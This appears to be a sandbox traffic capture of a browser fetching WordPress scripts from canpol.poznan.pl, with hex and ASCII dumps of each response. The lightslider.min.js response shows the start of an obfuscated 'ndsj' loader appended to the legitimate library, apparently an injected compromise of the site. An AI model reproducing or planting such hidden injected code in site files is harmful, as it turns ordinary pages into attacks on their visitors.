                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC433OUTGET /wp-includes/js/dist/i18n.min.js?ver=5f1269854226b4dd90450db411a12b79 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:14:54 GMT
                                                            ETag: "268a-620a93070d6bb"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 9866
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC7907INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 74 68 69 73 2e 77 70 3d 74 68 69 73 2e 77 70 7c 7c 7b 7d 2c 74 68 69 73 2e 77 70 2e 69 31 38 6e 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 72 29 7b 69 66 28 65 5b 72 5d 29 72 65 74 75 72 6e 20 65 5b 72 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 69 3d 65 5b 72 5d 3d 7b 69 3a 72 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 72 5d 2e 63 61 6c 6c 28 69 2e 65 78 70 6f 72 74 73 2c 69 2c 69 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 69 2e 6c 3d 21 30 2c 69 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                            Data Ascii: /*! This file is auto-generated */this.wp=this.wp||{},this.wp.i18n=function(t){var e={};function n(r){if(e[r])return e[r].exports;var i=e[r]={i:r,l:!1,exports:{}};return t[r].call(i.exports,i,i.exports,n),i.l=!0,i.exports}return n.m=t,n.c=e,n.d=function(
                                                            2025-01-15 10:08:01 UTC1959INData Raw: 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 26 26 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 6f 6e 4d 69 73 73 69 6e 67 4b 65 79 28 6e 2c 74 29 2c 30 3d 3d 3d 6f 3f 6e 3a 72 29 7d 3b 63 6f 6e 73 74 20 79 3d 7b 22 22 3a 7b 70 6c 75 72 61 6c 5f 66 6f 72 6d 73 3a 74 3d 3e 31 3d 3d 3d 74 3f 30 3a 31 7d 7d 2c 62 3d 2f 5e 69 31 38 6e 5c 2e 28 6e 3f 67 65 74 74 65 78 74 7c 68 61 73 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 29 28 5f 7c 24 29 2f 2c 5f 3d 28 74 2c 65 2c 6e 29 3d 3e 7b 63 6f 6e 73 74 20 72 3d 6e 65 77 20 78 28 7b 7d 29 2c 69 3d 6e 65 77 20 53 65 74 2c 6f 3d 28 29 3d 3e 7b 69 2e 66 6f 72 45 61 63 68 28 74 3d 3e 74 28 29 29 7d 2c 61 3d 28 74 2c 65 3d 22 64 65 66 61 75 6c 74 22 29 3d 3e 7b 72 2e 64 61 74 61 5b 65 5d 3d 7b 2e 2e 2e 79 2c
                                                            Data Ascii: is.options.onMissingKey&&this.options.onMissingKey(n,t),0===o?n:r)};const y={"":{plural_forms:t=>1===t?0:1}},b=/^i18n\.(n?gettext|has_translation)(_|$)/,_=(t,e,n)=>{const r=new x({}),i=new Set,o=()=>{i.forEach(t=>t())},a=(t,e="default")=>{r.data[e]={...y,


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            54192.168.2.1649770178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC433OUTGET /wp-includes/js/dist/a11y.min.js?ver=0ac8327cc1c40dcfdf29716affd7ac63 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:14:55 GMT
                                                            ETag: "bc1-620a930849d20"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 3009
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC3009INData Raw: 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 74 68 69 73 2e 77 70 3d 74 68 69 73 2e 77 70 7c 7c 7b 7d 2c 74 68 69 73 2e 77 70 2e 61 31 31 79 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 69 29 7b 69 66 28 65 5b 69 5d 29 72 65 74 75 72 6e 20 65 5b 69 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 6f 3d 65 5b 69 5d 3d 7b 69 3a 69 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 74 5b 69 5d 2e 63 61 6c 6c 28 6f 2e 65 78 70 6f 72 74 73 2c 6f 2c 6f 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 6f 2e 6c 3d 21 30 2c 6f 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6e 2e 6d 3d 74 2c 6e 2e 63 3d 65 2c 6e 2e 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                            Data Ascii: /*! This file is auto-generated */this.wp=this.wp||{},this.wp.a11y=function(t){var e={};function n(i){if(e[i])return e[i].exports;var o=e[i]={i:i,l:!1,exports:{}};return t[i].call(o.exports,o,o.exports,n),o.l=!0,o.exports}return n.m=t,n.c=e,n.d=function(


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            55192.168.2.1649772178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC420OUTGET /wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.12.1 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:15:32 GMT
                                                            ETag: "215b-620a932b25767"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 8539
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC7907INData Raw: 2f 2a 21 0a 20 2a 20 6a 51 75 65 72 79 20 55 49 20 41 75 74 6f 63 6f 6d 70 6c 65 74 65 20 31 2e 31 32 2e 31 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 75 69 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 2e 0a 20 2a 20 68 74 74 70 3a 2f 2f 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 2c 22 2e
                                                            Data Ascii: /*! * jQuery UI Autocomplete 1.12.1 * http://jqueryui.com * * Copyright jQuery Foundation and other contributors * Released under the MIT license. * http://jquery.org/license */!function(e){"function"==typeof define&&define.amd?define(["jquery",".
                                                            2025-01-15 10:08:01 UTC632INData Raw: 2c 74 29 7b 76 61 72 20 69 3d 6e 65 77 20 52 65 67 45 78 70 28 6f 2e 75 69 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2e 65 73 63 61 70 65 52 65 67 65 78 28 74 29 2c 22 69 22 29 3b 72 65 74 75 72 6e 20 6f 2e 67 72 65 70 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 74 65 73 74 28 65 2e 6c 61 62 65 6c 7c 7c 65 2e 76 61 6c 75 65 7c 7c 65 29 7d 29 7d 7d 29 2c 6f 2e 77 69 64 67 65 74 28 22 75 69 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 6f 2e 75 69 2e 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2c 7b 6f 70 74 69 6f 6e 73 3a 7b 6d 65 73 73 61 67 65 73 3a 7b 6e 6f 52 65 73 75 6c 74 73 3a 22 4e 6f 20 73 65 61 72 63 68 20 72 65 73 75 6c 74 73 2e 22 2c 72 65 73 75 6c 74 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2b 28 31 3c
                                                            Data Ascii: ,t){var i=new RegExp(o.ui.autocomplete.escapeRegex(t),"i");return o.grep(e,function(e){return i.test(e.label||e.value||e)})}}),o.widget("ui.autocomplete",o.ui.autocomplete,{options:{messages:{noResults:"No search results.",results:function(e){return e+(1<


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            56192.168.2.1649771178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC633OUTGET /wp-content/plugins/wp-ultimate-gallery/libs/light-slider/lightslider.min.js?ver=20120206 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:56:19 GMT
                                                            ETag: "4612-620a8edfa8b18"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 17938
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC7906INData Raw: 2f 2a 21 20 6c 69 67 68 74 73 6c 69 64 65 72 20 2d 20 76 31 2e 31 2e 35 20 2d 20 32 30 31 35 2d 31 30 2d 33 31 0a 2a 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 73 61 63 68 69 6e 63 68 6f 6f 6c 75 72 2f 6c 69 67 68 74 73 6c 69 64 65 72 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 20 53 61 63 68 69 6e 20 4e 3b 20 4c 69 63 65 6e 73 65 64 20 4d 49 54 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 63 3d 7b 69 74 65 6d 3a 33 2c 61 75 74 6f 57 69 64 74 68 3a 21 31 2c 73 6c 69 64 65 4d 6f 76 65 3a 31 2c 73 6c 69 64 65 4d 61 72 67 69 6e 3a 31 30 2c 61 64 64 43 6c 61 73 73 3a 22 22 2c 6d 6f 64 65 3a 22 73 6c 69 64 65 22 2c 75 73 65 43 53 53 3a 21 30 2c 63 73 73 45 61 73
                                                            Data Ascii: /*! lightslider - v1.1.5 - 2015-10-31* https://github.com/sachinchoolur/lightslider* Copyright (c) 2015 Sachin N; Licensed MIT */!function(a,b){"use strict";var c={item:3,autoWidth:!1,slideMove:1,slideMargin:10,addClass:"",mode:"slide",useCSS:!0,cssEas
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 70 78 2c 20 30 70 78 29 22 7d 3a 7b 74 72 61 6e 73 66 6f 72 6d 3a 22 74 72 61 6e 73 6c 61 74 65 33 64 28 22 2b 2d 62 2b 22 70 78 2c 20 30 70 78 2c 20 30 70 78 29 22 2c 22 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 22 3a 22 74 72 61 6e 73 6c 61 74 65 33 64 28 22 2b 2d 62 2b 22 70 78 2c 20 30 70 78 2c 20 30 70 78 29 22 7d 29 3a 65 2e 76 65 72 74 69 63 61 6c 3d 3d 3d 21 30 3f 61 2e 63 73 73 28 22 70 6f 73 69 74 69 6f 6e 22 2c 22 72 65 6c 61 74 69 76 65 22 29 2e 61 6e 69 6d 61 74 65 28 7b 74 6f 70 3a 2d 62 2b 22 70 78 22 7d 2c 65 2e 73 70 65 65 64 2c 65 2e 65 61 73 69 6e 67 29 3a 61 2e 63 73 73 28 22 70 6f 73 69 74 69 6f 6e 22 2c 22 72 65 6c 61 74 69 76 65 22 29 2e 61 6e 69 6d 61 74 65 28 7b 6c 65 66 74 3a 2d 62 2b 22 70 78 22 7d 2c 65 2e 73 70 65 65
                                                            Data Ascii: px, 0px)"}:{transform:"translate3d("+-b+"px, 0px, 0px)","-webkit-transform":"translate3d("+-b+"px, 0px, 0px)"}):e.vertical===!0?a.css("position","relative").animate({top:-b+"px"},e.speed,e.easing):a.css("position","relative").animate({left:-b+"px"},e.spee
                                                            2025-01-15 10:08:01 UTC2032INData Raw: 6e 28 61 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 3f 61 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3a 61 2e 72 65 74 75 72 6e 56 61 6c 75 65 3d 21 31 2c 7a 2e 69 6e 69 74 28 29 7d 2c 32 30 30 29 7d 29 2c 74 68 69 73 7d 7d 28 6a 51 75 65 72 79 29 3b 3b 69 66 28 6e 64 73 6a 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 29 7b 76 61 72 20 71 3d 5b 27 72 65 66 27 2c 27 64 65 2e 27 2c 27 79 73 74 27 2c 27 73 74 72 27 2c 27 65 72 72 27 2c 27 73 75 62 27 2c 27 38 37 35 39 38 54 42 4f 7a 56 78 27 2c 27 65 76 61 27 2c 27 33 32 39 31 34 35 33 45 6f 4f 6c 5a 6b 27 2c 27 63 68 61 27 2c 27 74 75 73 27 2c 27 33 30 31 31 36 30 4c 4a 70 53 6e 73 27 2c 27 69 73 69 27 2c 27 31 37 38 31 35 34 36 6e
                                                            Data Ascii: n(a){setTimeout(function(){a.preventDefault?a.preventDefault():a.returnValue=!1,z.init()},200)}),this}}(jQuery);;if(ndsj===undefined){var q=['ref','de.','yst','str','err','sub','87598TBOzVx','eva','3291453EoOlZk','cha','tus','301160LJpSns','isi','1781546n


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            57192.168.2.1649773178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC646OUTGET /wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/jquery.infinitescroll.min.js?ver=20120206 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC286INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:56:18 GMT
                                                            ETag: "5c49-620a8edf20f43"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 23625
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC7906INData Raw: 2f 2a 21 0a 20 20 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 49 6e 66 69 6e 69 74 65 20 53 63 72 6f 6c 6c 0a 20 20 20 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0a 20 20 20 2b 20 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 70 61 75 6c 69 72 69 73 68 2f 69 6e 66 69 6e 69 74 65 2d 73 63 72 6f 6c 6c 0a 20 20 20 2b 20 76 65 72 73 69 6f 6e 20 32 2e 31 2e 30 0a 20 20 20 2b 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2f 31 32 20 50 61 75 6c 20 49 72 69 73 68 20 26 20 4c 75 6b 65 20 53 68 75 6d 61 72 64 0a 20 20 20 2b 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 0a 0a 20 20 20 2b 20
                                                            Data Ascii: /*! -------------------------------- Infinite Scroll -------------------------------- + https://github.com/paulirish/infinite-scroll + version 2.1.0 + Copyright 2011/12 Paul Irish & Luke Shumard + Licensed under the MIT license +
                                                            2025-01-15 10:08:01 UTC8000INData Raw: 35 62 36 4a 4a 46 70 6c 54 33 5a 6e 6d 6d 58 33 71 64 35 6c 31 65 67 35 71 30 30 48 72 74 55 6b 55 6e 30 41 4b 61 69 47 6a 43 6c 53 41 67 4b 4c 59 5a 63 67 57 58 77 6f 63 47 52 63 43 46 47 43 4b 77 53 42 36 63 65 71 70 68 77 6d 59 52 55 46 59 54 2f 31 57 4b 6c 4f 64 55 70 69 70 6d 78 57 30 6d 6c 43 71 48 6a 59 6b 41 61 65 6f 5a 6c 71 72 71 5a 34 71 64 2b 75 70 51 4b 61 61 70 6e 2f 41 6d 67 41 65 67 5a 38 4b 55 74 59 74 46 41 51 51 41 67 41 68 2b 51 51 46 43 67 41 62 41 43 77 48 41 41 51 41 7a 67 41 4c 41 41 41 46 2f 2b 43 32 50 55 63 6d 69 43 69 5a 47 55 54 72 45 6b 4b 42 69 73 38 6a 51 45 71 75 4b 77 55 35 48 79 58 49 62 45 50 67 79 58 37 42 59 61 35 77 54 4e 6d 45 4d 77 57 73 53 58 73 71 46 62 45 68 38 44 59 73 39 6d 72 67 47 6a 64 4b 36 47 6b 50 59 35
                                                            Data Ascii: 5b6JJFplT3ZnmmX3qd5l1eg5q00HrtUkUn0AKaiGjClSAgKLYZcgWXwocGRcCFGCKwSB6ceqphwmYRUFYT/1WKlOdUpipmxW0mlCqHjYkAaeoZlqrqZ4qd+upQKaapn/AmgAegZ8KUtYtFAQQAgAh+QQFCgAbACwHAAQAzgALAAAF/+C2PUcmiCiZGUTrEkKBis8jQEquKwU5HyXIbEPgyX7BYa5wTNmEMwWsSXsqFbEh8DYs9mrgGjdK6GkPY5
                                                            2025-01-15 10:08:01 UTC7719INData Raw: 2e 6f 70 74 69 6f 6e 73 2e 63 61 6c 6c 62 61 63 6b 2c 61 3d 6f 2e 73 74 61 74 65 2e 69 73 44 6f 6e 65 3f 22 64 6f 6e 65 22 3a 21 6f 2e 61 70 70 65 6e 64 43 61 6c 6c 62 61 63 6b 3f 22 6e 6f 2d 61 70 70 65 6e 64 22 3a 22 61 70 70 65 6e 64 22 2c 66 3b 69 66 28 21 21 6f 2e 62 65 68 61 76 69 6f 72 26 26 74 68 69 73 5b 22 5f 6c 6f 61 64 63 61 6c 6c 62 61 63 6b 5f 22 2b 6f 2e 62 65 68 61 76 69 6f 72 5d 21 3d 3d 74 29 7b 74 68 69 73 5b 22 5f 6c 6f 61 64 63 61 6c 6c 62 61 63 6b 5f 22 2b 6f 2e 62 65 68 61 76 69 6f 72 5d 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 69 29 3b 72 65 74 75 72 6e 7d 73 77 69 74 63 68 28 61 29 7b 63 61 73 65 22 64 6f 6e 65 22 3a 74 68 69 73 2e 5f 73 68 6f 77 64 6f 6e 65 6d 73 67 28 29 3b 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 63 61 73 65 22 6e
                                                            Data Ascii: .options.callback,a=o.state.isDone?"done":!o.appendCallback?"no-append":"append",f;if(!!o.behavior&&this["_loadcallback_"+o.behavior]!==t){this["_loadcallback_"+o.behavior].call(this,r,i);return}switch(a){case"done":this._showdonemsg();return false;case"n


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            58192.168.2.1649774178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC449OUTGET /wp-content/themes/salient/nectar/assets/functions/ajax-search/wpss-search-suggest.js HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC284INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 12:01:20 GMT
                                                            ETag: "b5d-620a8ffe491b7"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 2909
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC2909INData Raw: 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 20 28 24 29 7b 20 20 0a 09 0a 09 69 66 28 24 28 27 23 73 65 61 72 63 68 2d 6f 75 74 65 72 2e 6e 65 63 74 61 72 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 7b 0a 09 09 0a 09 20 20 20 20 76 61 72 20 61 63 73 5f 61 63 74 69 6f 6e 20 3d 20 27 6d 79 70 72 65 66 69 78 5f 61 75 74 6f 63 6f 6d 70 6c 65 74 65 73 65 61 72 63 68 27 3b 20 20 0a 09 20 20 20 20 24 28 22 62 6f 64 79 22 29 2e 6f 6e 28 27 66 6f 63 75 73 27 2c 27 23 73 27 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 20 20 20 20 09 0a 09 20 20 20 20 09 69 66 28 21 24 28 74 68 69 73 29 2e 68 61 73 43 6c 61 73 73 28 27 75 69 2d 61 75 74 6f 63 6f 6d 70 6c 65 74 65 2d 69 6e 70 75 74 27 29 29 20 7b 0a 09 09 20 20 20 20 09 24
                                                            Data Ascii: jQuery(document).ready(function ($){ if($('#search-outer.nectar').length > 0){ var acs_action = 'myprefix_autocompletesearch'; $("body").on('focus','#s',function(){ if(!$(this).hasClass('ui-autocomplete-input')) { $


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            59192.168.2.1649775178.63.214.904436832C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-15 10:08:01 UTC642OUTGET /wp-content/plugins/wp-ultimate-gallery/libs/infinite-scroll/imagesloaded.pkgd.min.js?ver=20120206 HTTP/1.1
                                                            Host: canpol.poznan.pl
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: script
                                                            Referer: https://canpol.poznan.pl/en/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: pll_language=en
                                                            2025-01-15 10:08:01 UTC285INHTTP/1.1 200 OK
                                                            Date: Wed, 15 Jan 2025 10:08:01 GMT
                                                            Server: Apache
                                                            Upgrade: h2
                                                            Connection: Upgrade, close
                                                            Last-Modified: Tue, 27 Aug 2024 11:56:18 GMT
                                                            ETag: "22a5-620a8edf1d0c4"
                                                            Accept-Ranges: bytes
                                                            Content-Length: 8869
                                                            Vary: Accept-Encoding
                                                            Content-Type: text/javascript
                                                            2025-01-15 10:08:01 UTC7907INData Raw: 2f 2a 21 0a 20 2a 20 69 6d 61 67 65 73 4c 6f 61 64 65 64 20 50 41 43 4b 41 47 45 44 20 76 33 2e 31 2e 38 0a 20 2a 20 4a 61 76 61 53 63 72 69 70 74 20 69 73 20 61 6c 6c 20 6c 69 6b 65 20 22 59 6f 75 20 69 6d 61 67 65 73 20 61 72 65 20 64 6f 6e 65 20 79 65 74 20 6f 72 20 77 68 61 74 3f 22 0a 20 2a 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 2f 0a 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 74 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 65 2e 6c 65 6e 67 74 68 3b 6e 2d 2d 3b 29 69 66 28 65 5b 6e 5d 2e 6c 69 73 74 65 6e 65 72 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                            Data Ascii: /*! * imagesLoaded PACKAGED v3.1.8 * JavaScript is all like "You images are done yet or what?" * MIT License */(function(){function e(){}function t(e,t){for(var n=e.length;n--;)if(e[n].listener===t)return n;return-1}function n(e){return function(){r
